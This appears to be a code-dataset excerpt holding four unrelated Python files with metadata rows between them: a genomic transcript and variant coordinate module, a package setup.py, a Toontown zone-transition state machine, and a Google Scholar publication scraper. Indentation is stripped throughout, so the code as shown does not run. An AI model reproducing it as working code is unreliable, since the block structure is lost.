self._intron_tree.addi(leaf.start, leaf.stop + 1, leaf)
# add introns that are upstream and downstream to the exon
# sequence
# TODO: we may not need this, depending on how we choose to handle
# [start, stop] ranges that occur outside exon ranges
if self.strand == '+':
# straw upstream (genomic) intron
straw0 = \
Feature('.', 0, self._genomic_tree.begin() - 1, self.strand, None) # noqa
leaf0 = \
Transcript.CoordinateTranslator.Leaf(straw0, -1, 0)
self._intron_tree.addi(straw0.start, straw0.stop, leaf0)
# straw downstream (genomic) intron
straw1 = \
Feature('.', self._genomic_tree.end() + 1, sys.maxint, self.strand, None) # noqa
leaf1 = \
Transcript.CoordinateTranslator.Leaf(
straw1, self.coding_length - 1, self.coding_length) # noqa
self._intron_tree.addi(straw1.start, straw1.stop, leaf1)
else:
# straw upstream (genomic) intron
straw0 = \
Feature('.', 0, self._genomic_tree.begin() - 1, self.strand, None) # noqa
leaf0 = \
Transcript.CoordinateTranslator.Leaf(straw0, self.coding_length - 1, self.coding_length) # noqa
self._intron_tree.addi(straw0.start, straw0.stop, leaf0)
# straw downstream (genomic) intron
straw1 = \
Feature('.', self._genomic_tree.end() + 1, sys.maxint, self.strand, None) # noqa
leaf1 = \
Transcript.CoordinateTranslator.Leaf(straw1, -1, 0) # noqa
self._intron_tree.addi(straw1.start, straw1.stop, leaf1)
def to_coding_range(self, start, stop, hgvs_format=False):
# from above, introns have a coding_length == 1
# TODO: set 'intron' attribute on leaves in '_intron_tree'
# above
def _is_intron(leaf):
return leaf.coding_stop - leaf.coding_start == 1
# coding start
range_coding_start = (
list(self._genomic_tree[start] | self._intron_tree[start]) or
[None]
)[0]
coding_start = None
intron_coding_offset_start = 0
leaf = range_coding_start.data
if _is_intron(leaf):
if self.strand == '+':
delta0 = start - leaf.start + 1
delta1 = leaf.stop + 1 - start
if hgvs_format and delta0 > delta1:
coding_start = leaf.coding_stop
intron_coding_offset_start = -delta1
else:
coding_start = leaf.coding_start
intron_coding_offset_start = delta0
else:
delta0 = leaf.stop + 1 - stop
delta1 = stop - leaf.start + 1
if hgvs_format and delta0 > delta1:
coding_start = leaf.coding_stop
intron_coding_offset_start = -delta1
else:
coding_start = leaf.coding_start
intron_coding_offset_start = delta0
else:
if self.strand == '+':
coding_start = \
leaf.coding_start + (start - leaf.start)
else:
coding_start = \
leaf.coding_start + (leaf.stop - stop)
# coding stop
range_coding_stop = (
list(self._genomic_tree[stop] | self._intron_tree[stop]) or
[None]
)[0]
coding_stop = None
intron_coding_offset_stop = 0
leaf = range_coding_stop.data
if _is_intron(leaf):
if self.strand == '+':
delta0 = stop - leaf.start + 1
delta1 = leaf.stop + 1 - stop
if hgvs_format and delta0 > delta1:
coding_stop = leaf.coding_stop
intron_coding_offset_stop = -delta1
else:
coding_stop = leaf.coding_start
intron_coding_offset_stop = delta0
else:
delta0 = leaf.stop + 1 - start
delta1 = start - leaf.start + 1
if hgvs_format and delta0 > delta1:
coding_stop = leaf.coding_stop
intron_coding_offset_stop = -delta1
else:
coding_stop = leaf.coding_start
intron_coding_offset_stop = delta0
else:
if self.strand == '+':
coding_stop = \
leaf.coding_stop - (leaf.stop - stop)
else:
coding_stop = \
leaf.coding_stop - (start - leaf.start)
return \
Transcript.CodingRange(
coding_start,
coding_stop,
intron_coding_offset_start,
intron_coding_offset_stop
)
def to_genomic_ranges(self, coding_start, coding_stop):
genomic_ranges = []
list_ranges = sorted(
self._exon_tree[coding_start:coding_stop + 1],
reverse=self.strand == '-'
)
for leaf in [r.data for r in list_ranges]:
if self.strand == '+':
genomic_ranges.append(
Transcript.GenomicRange(
leaf.start + max(coding_start - leaf.coding_start, 0), # noqa
leaf.stop - max(leaf.coding_stop - coding_stop, 0) # noqa
)
)
else:
genomic_ranges.append(
Transcript.GenomicRange(
leaf.start + max(leaf.coding_stop - coding_stop, 0), # noqa
leaf.stop - max(coding_start - leaf.coding_start, 0) # noqa
)
)
return genomic_ranges
def __str__(self):
return 'coding sequences: %s' % map(str, self._tree)
class EnsemblTranscript(Transcript):
feature = 'transcript'
id_field = 'transcript_id'
gene_id_field = 'gene_id'
def _build(self, data, force=False):
# create feature arrays...
for d in data:
feature_types = [d.get('feature').lower()]
for feature_type in feature_types:
self.add_feature(
feature_type,
Feature(
d['chromosome'],
d['start'],
d['stop'],
d['strand'],
d['frame'],
d['info']
)
)
# super hack! append 'stop_codon', if it exists, to
# the last CDS (if '+' strand) or first CDS (if '-' strand)
# including the stop codon in the last CDS makes lots of math
# and calculations easier for both VEP and HGVS
stop_codon = (self.get_features('stop_codon') or [None])[-1]
if self.strand == '+':
stop_cds = self.last('cds')
else:
stop_cds = self.first('cds')
if stop_codon and stop_cds:
# BUG FIX: ENST00000470843
# transcript where entirety of last exon is a stop codon.
# if so, append a new CDS, else update stop position
# of last codon
# uggh....
if self.strand == '+':
self.add_feature(
'cds',
Feature(
stop_codon.chromosome,
stop_codon.start,
stop_codon.stop,
stop_codon.strand,
stop_codon.frame,
stop_codon.info
)
)
else:
self.add_feature(
'cds',
Feature(
stop_codon.chromosome,
stop_codon.start,
stop_codon.stop,
stop_codon.strand,
stop_codon.frame,
stop_codon.info
)
)
# fix frame start...
if self.strand == '+':
start_cds = (self.coding_sequences or [None])[0]
if start_cds and start_cds.frame is not None:
start_cds.start += start_cds.frame
else:
start_cds = (self.coding_sequences or [None])[-1]
if start_cds and start_cds.frame is not None:
start_cds.stop -= start_cds.frame
# calculate coding coordinate system
if self.is_coding:
if self.strand == '+':
_cds = self.first('cds')
_coding_offset = 0
for _exon in self.exons:
if _exon.contains(_cds):
self._coding_offsets = \
Transcript.CodingOffset(
_coding_offset + (_cds.start - _exon.start),
sum([x.length for x in self.coding_sequences])
)
break
else:
_coding_offset += _exon.length
else:
_cds = self.last('cds')
_coding_offset = 0
for _exon in self.exons[::-1]:
if _exon.contains(_cds):
self._coding_offsets = \
Transcript.CodingOffset(
_coding_offset + (_exon.stop - _cds.stop),
sum([x.length for x in self.coding_sequences])
)
break
else:
_coding_offset += _exon.length
# create introns...
# not sure this sort is required anymore...
sorted_exons = sorted(self.get_features('exon'))
for i in range(1, len(sorted_exons)):
x_prev = sorted_exons[i - 1]
x = sorted_exons[i]
intron = Feature(
x.chromosome,
x_prev.stop + 1,
x.start - 1,
x.strand,
x.frame,
x.info
)
self.add_feature('intron', intron)
# build acceptor/donor splice junctions
if self.strand == '+':
self.add_feature(
'splice_acceptor_junction',
VepSpliceAcceptorJunction(self, intron)
)
self.add_feature(
'splice_donor_junction',
VepSpliceDonorJunction(self, intron)
)
else:
# negative strand
self.add_feature(
'splice_acceptor_junction',
VepSpliceAcceptorJunction(self, intron)
)
self.add_feature(
'splice_donor_junction',
VepSpliceDonorJunction(self, intron)
)
self._built = True
class GencodeTranscript(EnsemblTranscript):
pass
class NcbiTranscript(Transcript):
feature = 'RNA'
id_field = 'transcript_id'
gene_id_field = 'gene_id'
def _build(self, data, force=False):
# create feature arrays...
for d in data:
self.add_feature(
d.get('feature').lower(),
Feature(
d['chromosome'],
d['start'],
d['stop'],
d['strand'],
None,
d.get('info', {})
)
)
# add in frames...
# we have to calculate these by hand from the MapView file
prev_cds = None
for (i, cds) in enumerate(self.get_features('cds')):
if i == 0:
cds.frame = 0
else:
cds.frame = (prev_cds.frame + prev_cds.length) % 3
prev_cds = cds
# build exons
exonic_features = \
sorted(self.coding_sequences + self.get_features('utr'))
exon = None
for feature in exonic_features:
if exon and exon.stop == feature.start - 1:
exon.stop = feature.stop
continue
exon = \
Feature(
feature.chromosome,
feature.start,
feature.stop,
feature.strand,
feature.frame,
feature.info
)
self.add_feature('exon', exon)
# calculate coding coordinate system
if self.is_coding:
if self.strand == '+':
_cds = (self.coding_sequences or [None])[0]
_coding_offset = 0
for _exon in self.exons:
if _exon.contains(_cds):
self._coding_offsets = \
Transcript.CodingOffset(
_coding_offset + (_cds.start - _exon.start),
sum([x.length for x in self.coding_sequences])
)
break
else:
_coding_offset += _exon.length
else:
_cds = (self.coding_sequences or [None])[-1]
_coding_offset = 0
for _exon in reversed(self.exons):
if _exon.contains(_cds):
self._coding_offsets = \
Transcript.CodingOffset(
_coding_offset + (_exon.stop - _cds.stop),
sum([x.length for x in self.coding_sequences])
)
break
else:
_coding_offset += _exon.length
# create introns...
# not sure this sort is required anymore...
sorted_exons = sorted(self.get_features('exon'))
for i in range(1, len(sorted_exons)):
x_prev = sorted_exons[i - 1]
x = sorted_exons[i]
intron = Feature(
x.chromosome,
x_prev.stop + 1,
x.start - 1,
x.strand,
x.frame,
x.info
)
self.add_feature('intron', intron)
# build acceptor/donor splice junctions
if self.strand == '+':
self.add_feature(
'splice_acceptor_junction',
VepSpliceAcceptorJunction(self, intron)
)
self.add_feature(
'splice_donor_junction',
VepSpliceDonorJunction(self, intron)
)
else:
# negative strand
self.add_feature(
'splice_acceptor_junction',
VepSpliceAcceptorJunction(self, intron)
)
self.add_feature(
'splice_donor_junction',
VepSpliceDonorJunction(self, intron)
)
self._built = True
class Variant(Feature):
type = 'variant'
def __init__(self, chromosome, start, ref, alt,
genome_build='GRCh37'):
self.reference_allele = ref
self.alternate_allele = alt
super(Variant, self).__init__(
chromosome,
start,
start + max(len(ref) - 1, 0),
'.',
None,
genome_build=genome_build
)
self._offset_variant = None
self._effective_variant = None
def clone(self):
return Variant(
self.chromosome,
self.start,
self.reference_allele,
self.alternate_allele,
genome_build=self.genome_build
)
# override these methods to define custom sorting/comparator
def hash(self):
return str(self)
@property
def sequence_length(self):
if self.is_insertion:
return len(self.alternate_allele)
else:
return \
abs(len(self.reference_allele) - len(self.alternate_allele))
# Variant types
@property
def is_substitution(self):
return \
len(self.reference_allele) == len(self.alternate_allele)
@property
def is_indel(self):
return \
len(self.reference_allele) > 1 and len(self.alternate_allele) > 1
@property
def is_insertion(self):
return \
len(self.alternate_allele) > 1 and \
len(self.reference_allele) == 1
@property
def is_deletion(self):
return \
len(self.reference_allele) > 1 and \
len(self.alternate_allele) == 1
@property
def is_snp(self):
return \
len(self.reference_allele) == 1 and \
len(self.reference_allele) == len(self.alternate_allele)
@property
def reference_length(self):
return len(self.reference_allele)
@property
def alternate_length(self):
return len(self.alternate_allele)
# Variant sequence coordinates
def offset_variant(self):
if not self._offset_variant:
variant = self.clone()
if variant.reference_allele[0] == variant.alternate_allele[0]:
variant.reference_allele = variant.reference_allele[1:]
variant.alternate_allele = variant.alternate_allele[1:]
variant.start += 1
self._offset_variant = variant
return self._offset_variant
def offset_reference(self):
if self.reference_allele[0] == self.alternate_allele[0]:
return self.reference_allele[1:]
def offset_alternate(self):
if self.reference_allele[0] == self.alternate_allele[0]:
return self.alternate_allele[1:]
@property
def effective_variant(self):
if not self._effective_variant:
self._effective_variant = EffectiveVariant(self)
return self._effective_variant
@property
def sbid(self):
return '{}-{}-{}-{}-{}'.format(
self.genome_build,
self.chromosome,
self.start,
self.stop,
self.alternate_allele
)
def __eq__(self, feature):
return \
self.__class__ == feature.__class__ and \
self.chromosome == feature.chromosome and \
self.start == feature.start and \
self.stop == feature.stop and \
self.reference_allele == feature.reference_allele and \
self.alternate_allele == feature.alternate_allele
def __str__(self):
return (
'feature: %s, chromosome: %s, coordinates: [%s, %s, %s --> %s]' % # noqa
(
self.__class__.__name__,
self.chromosome,
self.start,
self.stop,
self.reference_allele,
self.alternate_allele
)
)
class EffectiveVariant(Variant):
def __init__(self, variant):
# avoid InceptionVariant. ensure that we don't make an
# EffectiveVariant for an EffectiveVariant
if isinstance(variant, EffectiveVariant):
chromosome = variant.chromosome
start = variant.start
reference_allele = variant.reference_allele
alternate_allele = variant.alternate_allele
# keep a reference to the original. useful for printing.
self.original_variant = variant.original_variant
else:
# keep a reference to the original. useful for printing.
self.original_variant = variant
if variant.reference_allele == variant.alternate_allele:
chromosome = variant.chromosome
start = variant.start
reference_allele = variant.reference_allele
alternate_allele = variant.alternate_allele
elif variant.is_snp:
chromosome = variant.chromosome
start = variant.start
reference_allele = variant.reference_allele
alternate_allele = variant.alternate_allele
elif variant.is_indel:
# remove common nucleotides...
ref = variant.reference_allele
alt = variant.alternate_allele
i = 0
while i < min(len(ref), len(alt)) and ref[i] == alt[i]:
i += 1
chromosome = variant.chromosome
start = variant.start + i
reference_allele = ref[i:]
alternate_allele = alt[i:]
elif variant.is_deletion:
chromosome = variant.chromosome
start = variant.start + 1
reference_allele = variant.reference_allele[1:]
alternate_allele = ''
elif variant.is_insertion:
chromosome = variant.chromosome
start = variant.start
reference_allele = ''
alternate_allele = variant.alternate_allele[1:]
else:
raise errors.VeppyFeatureException(
'Unsupported variant: %s' % variant)
super(EffectiveVariant, self).__init__(
chromosome,
start,
reference_allele,
alternate_allele
)
# force insertions to have a [start, stop] range that
# overlaps the location of the inserted alternate allele
# essentially, make variant.stop == site of first inserted
# alternate allele
if self.is_insertion:
self.stop = self.start + 1
# Variant types
@property
def is_substitution(self):
return self.original_variant.is_substitution
@property
def is_indel(self):
return self.original_variant.is_indel
@property
def is_insertion(self):
return self.original_variant.is_insertion
@property
def is_deletion(self):
return self.original_variant.is_deletion
@property
def is_snp(self):
return self.original_variant.is_snp
def clone(self):
return EffectiveVariant(self)
def __str__(self):
return str(self.original_variant)
| 32.349826 | 118 | 0.50919 |
4a1f6109b7ed4e99d15b4d4e1e14467e14af5a1b | 657 | py | Python | setup.py | stephen-david-evans/execs | 96397ee381f2d6d37dccf6dc9001ac83aab346db | [
"MIT"
] | null | null | null | setup.py | stephen-david-evans/execs | 96397ee381f2d6d37dccf6dc9001ac83aab346db | [
"MIT"
] | null | null | null | setup.py | stephen-david-evans/execs | 96397ee381f2d6d37dccf6dc9001ac83aab346db | [
"MIT"
] | null | null | null | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="execs",
version="0.0.1",
author="Stephen Evans",
author_email="[email protected]",
description="Experimental Entity Component System",
long_description=long_description,
long_description_type="text/markdown",
url="https://github.com/stephen-david-evans/execs",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires=">=3.6",
)
| 28.565217 | 55 | 0.665145 |
4a1f61e6fd199d2394225dac0a2ba8678678a115 | 15,814 | py | Python | toontown/hood/QuietZoneState.py | TheFamiliarScoot/open-toontown | 678313033174ea7d08e5c2823bd7b473701ff547 | [
"BSD-3-Clause"
] | 99 | 2019-11-02T22:25:00.000Z | 2022-02-03T03:48:00.000Z | toontown/hood/QuietZoneState.py | TheFamiliarScoot/open-toontown | 678313033174ea7d08e5c2823bd7b473701ff547 | [
"BSD-3-Clause"
] | 42 | 2019-11-03T05:31:08.000Z | 2022-03-16T22:50:32.000Z | toontown/hood/QuietZoneState.py | TheFamiliarScoot/open-toontown | 678313033174ea7d08e5c2823bd7b473701ff547 | [
"BSD-3-Clause"
] | 57 | 2019-11-03T07:47:37.000Z | 2022-03-22T00:41:49.000Z | from pandac.PandaModules import *
from direct.showbase.PythonUtil import Functor, PriorityCallbacks
from direct.task import Task
from toontown.distributed.ToontownMsgTypes import *
from otp.otpbase import OTPGlobals
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import StateData
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from . import ZoneUtil
class QuietZoneState(StateData.StateData):
notify = DirectNotifyGlobal.directNotify.newCategory('QuietZoneState')
Disable = False
Queue = []
def __init__(self, doneEvent):
StateData.StateData.__init__(self, doneEvent)
self.fsm = ClassicFSM.ClassicFSM('QuietZoneState', [State.State('off', self.enterOff, self.exitOff, ['waitForQuietZoneResponse']),
State.State('waitForQuietZoneResponse', self.enterWaitForQuietZoneResponse, self.exitWaitForQuietZoneResponse, ['waitForZoneRedirect']),
State.State('waitForZoneRedirect', self.enterWaitForZoneRedirect, self.exitWaitForZoneRedirect, ['waitForSetZoneResponse']),
State.State('waitForSetZoneResponse', self.enterWaitForSetZoneResponse, self.exitWaitForSetZoneResponse, ['waitForSetZoneComplete']),
State.State('waitForSetZoneComplete', self.enterWaitForSetZoneComplete, self.exitWaitForSetZoneComplete, ['waitForLocalAvatarOnShard']),
State.State('waitForLocalAvatarOnShard', self.enterWaitForLocalAvatarOnShard, self.exitWaitForLocalAvatarOnShard, ['off'])], 'off', 'off')
self._enqueueCount = 0
self.fsm.enterInitialState()
def load(self):
self.notify.debug('load()')
def unload(self):
self._dequeue()
self.notify.debug('unload()')
del self.fsm
@classmethod
def enqueueState(cls, state, requestStatus):
cls.Queue = [(state, requestStatus)] + cls.Queue
state._enqueueCount += 1
if len(cls.Queue) == 1:
cls.startNextQueuedState()
@classmethod
def dequeueState(cls, state):
s, requestStatus = cls.Queue.pop()
s._enqueueCount -= 1
if len(cls.Queue) > 0:
cls.startNextQueuedState()
@classmethod
def startNextQueuedState(cls):
state, requestStatus = cls.Queue[-1]
state._start(requestStatus)
def _dequeue(self):
newQ = []
for item in self.__class__.Queue:
state, requestStatus = item
if state is not self:
newQ.append(item)
self.__class__.Queue = newQ
def getEnterWaitForSetZoneResponseMsg(self):
return 'enterWaitForSetZoneResponse-%s' % (id(self),)
def getQuietZoneLeftEvent(self):
return '%s-%s' % (base.cr.getQuietZoneLeftEvent(), id(self))
def getSetZoneCompleteEvent(self):
return 'setZoneComplete-%s' % (id(self),)
def enter(self, requestStatus):
self.notify.debug('enter(requestStatus=' + str(requestStatus) + ')')
self._requestStatus = requestStatus
self._leftQuietZoneCallbacks = None
self._setZoneCompleteCallbacks = None
self._leftQuietZoneLocalCallbacks = {}
self._setZoneCompleteLocalCallbacks = {}
self.enqueueState(self, requestStatus)
return
def _start(self, requestStatus):
base.transitions.fadeScreen(1.0)
self.fsm.request('waitForQuietZoneResponse')
def getRequestStatus(self):
return self._requestStatus
def exit(self):
self.notify.debug('exit()')
del self._requestStatus
base.transitions.noTransitions()
self.fsm.request('off')
self._dequeue()
def waitForDatabase(self, description):
if base.endlessQuietZone:
return
base.cr.waitForDatabaseTimeout(requestName='quietZoneState-%s' % description)
def clearWaitForDatabase(self):
base.cr.cleanupWaitingForDatabase()
def addLeftQuietZoneCallback(self, callback, priority = None):
if self._leftQuietZoneCallbacks:
return self._leftQuietZoneCallbacks.add(callback, priority)
else:
token = PriorityCallbacks.GetToken()
fdc = SubframeCall(callback, taskMgr.getCurrentTask().getPriority() - 1)
self._leftQuietZoneLocalCallbacks[token] = fdc
return token
def removeLeftQuietZoneCallback(self, token):
if token is not None:
lc = self._leftQuietZoneLocalCallbacks.pop(token, None)
if lc:
lc.cleanup()
if self._leftQuietZoneCallbacks:
self._leftQuietZoneCallbacks.remove(token)
return
def addSetZoneCompleteCallback(self, callback, priority = None):
if self._setZoneCompleteCallbacks:
return self._setZoneCompleteCallbacks.add(callback, priority)
else:
token = PriorityCallbacks.GetToken()
fdc = SubframeCall(callback, taskMgr.getCurrentTask().getPriority() - 1)
self._setZoneCompleteLocalCallbacks[token] = fdc
return token
def removeSetZoneCompleteCallback(self, token):
if token is not None:
lc = self._setZoneCompleteLocalCallbacks.pop(token, None)
if lc:
lc.cleanup()
if self._setZoneCompleteCallbacks:
self._setZoneCompleteCallbacks.remove(token)
return
if not __astron__:
def handleWaitForQuietZoneResponse(self, msgType, di):
# self.notify.debug('handleWaitForQuietZoneResponse(' + 'msgType=' + str(msgType) + ', di=' + str(di) + ')')
if msgType == CLIENT_CREATE_OBJECT_REQUIRED:
base.cr.handleQuietZoneGenerateWithRequired(di)
elif msgType == CLIENT_CREATE_OBJECT_REQUIRED_OTHER:
base.cr.handleQuietZoneGenerateWithRequiredOther(di)
elif msgType == CLIENT_OBJECT_UPDATE_FIELD:
base.cr.handleQuietZoneUpdateField(di)
elif msgType in QUIET_ZONE_IGNORED_LIST:
self.notify.debug('ignoring unwanted message from previous zone')
else:
base.cr.handlePlayGame(msgType, di)
else:
def handleWaitForQuietZoneResponse(self, msgType, di):
# self.notify.debug('handleWaitForQuietZoneResponse(' + 'msgType=' + str(msgType) + ', di=' + str(di) + ')')
if msgType == CLIENT_ENTER_OBJECT_REQUIRED:
base.cr.handleQuietZoneGenerateWithRequired(di)
elif msgType == CLIENT_ENTER_OBJECT_REQUIRED_OTHER:
base.cr.handleQuietZoneGenerateWithRequiredOther(di)
elif msgType == CLIENT_OBJECT_SET_FIELD:
base.cr.handleQuietZoneUpdateField(di)
elif msgType in QUIET_ZONE_IGNORED_LIST:
self.notify.debug('ignoring unwanted message from previous zone')
else:
base.cr.handlePlayGame(msgType, di)
if not __astron__:
def handleWaitForZoneRedirect(self, msgType, di):
# self.notify.debug('handleWaitForZoneRedirect(' + 'msgType=' + str(msgType) + ', di=' + str(di) + ')')
if msgType == CLIENT_CREATE_OBJECT_REQUIRED:
base.cr.handleQuietZoneGenerateWithRequired(di)
elif msgType == CLIENT_CREATE_OBJECT_REQUIRED_OTHER:
base.cr.handleQuietZoneGenerateWithRequiredOther(di)
elif msgType == CLIENT_OBJECT_UPDATE_FIELD:
base.cr.handleQuietZoneUpdateField(di)
else:
base.cr.handlePlayGame(msgType, di)
else:
def handleWaitForZoneRedirect(self, msgType, di):
# self.notify.debug('handleWaitForZoneRedirect(' + 'msgType=' + str(msgType) + ', di=' + str(di) + ')')
if msgType == CLIENT_ENTER_OBJECT_REQUIRED:
base.cr.handleQuietZoneGenerateWithRequired(di)
elif msgType == CLIENT_ENTER_OBJECT_REQUIRED_OTHER:
base.cr.handleQuietZoneGenerateWithRequiredOther(di)
elif msgType == CLIENT_OBJECT_SET_FIELD:
base.cr.handleQuietZoneUpdateField(di)
else:
base.cr.handlePlayGame(msgType, di)
def enterOff(self):
self.notify.debug('enterOff()')
def exitOff(self):
self.notify.debug('exitOff()')
self._leftQuietZoneCallbacks = PriorityCallbacks()
self._setZoneCompleteCallbacks = PriorityCallbacks()
self._leftQuietZoneLocalCallbacks = {}
self._setZoneCompleteLocalCallbacks = {}
def enterWaitForQuietZoneResponse(self):
# self.notify.debug('enterWaitForQuietZoneResponse(doneStatus=' + str(self._requestStatus) + ')')
if not self.Disable:
base.cr.handler = self.handleWaitForQuietZoneResponse
base.cr.handlerArgs = self._requestStatus
base.cr.setInQuietZone(True)
self.setZoneDoneEvent = base.cr.getNextSetZoneDoneEvent()
self.acceptOnce(self.setZoneDoneEvent, self._handleQuietZoneComplete)
self.waitForDatabase('WaitForQuietZoneResponse')
if base.slowQuietZone:
def sQZR(task):
base.cr.sendQuietZoneRequest()
return Task.done
taskMgr.doMethodLater(base.slowQuietZoneDelay, sQZR, 'slowQuietZone-sendQuietZoneRequest')
else:
base.cr.sendQuietZoneRequest()
def _handleQuietZoneComplete(self):
self.fsm.request('waitForZoneRedirect')
def exitWaitForQuietZoneResponse(self):
self.notify.debug('exitWaitForQuietZoneResponse()')
self.clearWaitForDatabase()
base.cr.handler = base.cr.handlePlayGame
base.cr.handlerArgs = None
base.cr.setInQuietZone(False)
self.ignore(self.setZoneDoneEvent)
del self.setZoneDoneEvent
return
def enterWaitForZoneRedirect(self):
# self.notify.debug('enterWaitForZoneRedirect(requestStatus=' + str(self._requestStatus) + ')')
if not self.Disable:
base.cr.handler = self.handleWaitForZoneRedirect
base.cr.handlerArgs = self._requestStatus
base.cr.setInQuietZone(True)
self.waitForDatabase('WaitForZoneRedirect')
zoneId = self._requestStatus['zoneId']
avId = self._requestStatus.get('avId', -1)
allowRedirect = self._requestStatus.get('allowRedirect', 1)
if avId != -1:
allowRedirect = 0
if not base.cr.welcomeValleyManager:
newZoneId = ZoneUtil.getCanonicalZoneId(zoneId)
if newZoneId != zoneId:
self.gotZoneRedirect(newZoneId)
return
if allowRedirect and ZoneUtil.isWelcomeValley(zoneId):
self.notify.info('Requesting AI redirect from zone %s.' % zoneId)
if base.slowQuietZone:
def rZI(task, zoneId = zoneId, self = self):
base.cr.welcomeValleyManager.requestZoneId(zoneId, self.gotZoneRedirect)
return Task.done
taskMgr.doMethodLater(base.slowQuietZoneDelay, rZI, 'slowQuietZone-welcomeValleyRedirect')
else:
base.cr.welcomeValleyManager.requestZoneId(zoneId, self.gotZoneRedirect)
else:
self.fsm.request('waitForSetZoneResponse')
def gotZoneRedirect(self, zoneId):
self.notify.info('Redirecting to zone %s.' % zoneId)
base.cr.handlerArgs['zoneId'] = zoneId
base.cr.handlerArgs['hoodId'] = ZoneUtil.getHoodId(zoneId)
self.fsm.request('waitForSetZoneResponse')
def exitWaitForZoneRedirect(self):
self.notify.debug('exitWaitForZoneRedirect()')
self.clearWaitForDatabase()
base.cr.handler = base.cr.handlePlayGame
base.cr.handlerArgs = None
base.cr.setInQuietZone(False)
return
def enterWaitForSetZoneResponse(self):
# self.notify.debug('enterWaitForSetZoneResponse(requestStatus=' + str(self._requestStatus) + ')')
if not self.Disable:
messenger.send(self.getEnterWaitForSetZoneResponseMsg(), [self._requestStatus])
base.cr.handlerArgs = self._requestStatus
zoneId = self._requestStatus['zoneId']
base.cr.dumpAllSubShardObjects()
base.cr.resetDeletedSubShardDoIds()
base.cr.sendSetZoneMsg(zoneId)
self.waitForDatabase('WaitForSetZoneResponse')
self.fsm.request('waitForSetZoneComplete')
def exitWaitForSetZoneResponse(self):
self.notify.debug('exitWaitForSetZoneResponse()')
self.clearWaitForDatabase()
base.cr.handler = base.cr.handlePlayGame
base.cr.handlerArgs = None
return
def enterWaitForSetZoneComplete(self):
# self.notify.debug('enterWaitForSetZoneComplete(requestStatus=' + str(self._requestStatus) + ')')
if not self.Disable:
base.cr.handlerArgs = self._requestStatus
if base.slowQuietZone:
def delayFunc(self = self):
def hSZC(task):
self._handleSetZoneComplete()
return Task.done
taskMgr.doMethodLater(base.slowQuietZoneDelay, hSZC, 'slowQuietZone-sendSetZoneComplete')
nextFunc = delayFunc
else:
nextFunc = self._handleSetZoneComplete
self.waitForDatabase('WaitForSetZoneComplete')
self.setZoneDoneEvent = base.cr.getLastSetZoneDoneEvent()
self.acceptOnce(self.setZoneDoneEvent, nextFunc)
if base.placeBeforeObjects:
self._leftQuietZoneCallbacks()
self._leftQuietZoneCallbacks = None
fdcs = list(self._leftQuietZoneLocalCallbacks.values())
self._leftQuietZoneLocalCallbacks = {}
for fdc in fdcs:
if not fdc.isFinished():
fdc.finish()
messenger.send(self.getQuietZoneLeftEvent())
return
def _handleSetZoneComplete(self):
self.fsm.request('waitForLocalAvatarOnShard')
def exitWaitForSetZoneComplete(self):
self.notify.debug('exitWaitForSetZoneComplete()')
self.clearWaitForDatabase()
base.cr.handler = base.cr.handlePlayGame
base.cr.handlerArgs = None
self.ignore(self.setZoneDoneEvent)
del self.setZoneDoneEvent
return
def enterWaitForLocalAvatarOnShard(self):
self.notify.debug('enterWaitForLocalAvatarOnShard()')
if not self.Disable:
base.cr.handlerArgs = self._requestStatus
self._onShardEvent = localAvatar.getArrivedOnDistrictEvent()
self.waitForDatabase('WaitForLocalAvatarOnShard')
if localAvatar.isGeneratedOnDistrict(localAvatar.defaultShard):
self._announceDone()
else:
self.acceptOnce(self._onShardEvent, self._announceDone)
def _announceDone(self):
base.localAvatar.startChat()
if base.endlessQuietZone:
self._dequeue()
return
doneEvent = self.doneEvent
requestStatus = self._requestStatus
self._setZoneCompleteCallbacks()
self._setZoneCompleteCallbacks = None
fdcs = list(self._setZoneCompleteLocalCallbacks.values())
self._setZoneCompleteLocalCallbacks = {}
for fdc in fdcs:
if not fdc.isFinished():
fdc.finish()
messenger.send(self.getSetZoneCompleteEvent(), [requestStatus])
messenger.send(doneEvent)
self._dequeue()
return
def exitWaitForLocalAvatarOnShard(self):
self.notify.debug('exitWaitForLocalAvatarOnShard()')
self.clearWaitForDatabase()
self.ignore(self._onShardEvent)
base.cr.handlerArgs = None
del self._onShardEvent
return
| 41.725594 | 147 | 0.652333 |
4a1f63002d19f6d62d374f34d0e2a69418352e45 | 2,596 | py | Python | Google Scholar Crawler/main.py | yuezih/Yuezih-Playground | 82bc5b09ed2748cee42185763ea9fbaab9b79f86 | [
"MIT"
] | 1 | 2022-03-06T04:43:52.000Z | 2022-03-06T04:43:52.000Z | Google Scholar Crawler/main.py | yuezih/Yuezih-Playground | 82bc5b09ed2748cee42185763ea9fbaab9b79f86 | [
"MIT"
] | null | null | null | Google Scholar Crawler/main.py | yuezih/Yuezih-Playground | 82bc5b09ed2748cee42185763ea9fbaab9b79f86 | [
"MIT"
] | null | null | null | import urllib.parse
import urllib.request
import re
import operator
class Author(object):
def __init__(self):
self.name = ''
self.artNum = 0
self.artTitle = []
authors = []
authorDict = {}
index = 0
data = ""
author_list = []
def getData(url):
header_dict={'Host': 'scholar.google.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36',
'Accept': '*/*',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Referer': 'https://scholar.google.co.id/citations?hl=zh-CN&user=oqYL6fQAAAAJ',
'Connection': 'keep-alive'}
req = urllib.request.Request(url=url,headers=header_dict)
response = urllib.request.urlopen(req,timeout=120)
tempdata = response.read()
tempdata = tempdata.decode()
return tempdata
urls = ['https://scholar.google.co.id/citations?hl=zh-CN&user=oqYL6fQAAAAJ',
'https://scholar.google.co.id/citations?hl=zh-CN&user=oqYL6fQAAAAJ&cstart=20&pagesize=80',
'https://scholar.google.co.id/citations?hl=zh-CN&user=oqYL6fQAAAAJ&cstart=100&pagesize=100',
'https://scholar.google.co.id/citations?hl=zh-CN&user=oqYL6fQAAAAJ&cstart=200&pagesize=100']
for each in urls:
data += getData(each)
title_pattern = re.compile(r'gsc_a_at">.*?<')
author_pattern = re.compile(r'<div class="gs_gray">.*?</div><')
publisher_pattern = re.compile(r'</div><div class="gs_gray">.*?<span')
title = re.findall(title_pattern, data)
author = re.findall(author_pattern, data)
publisher = re.findall(publisher_pattern, data)
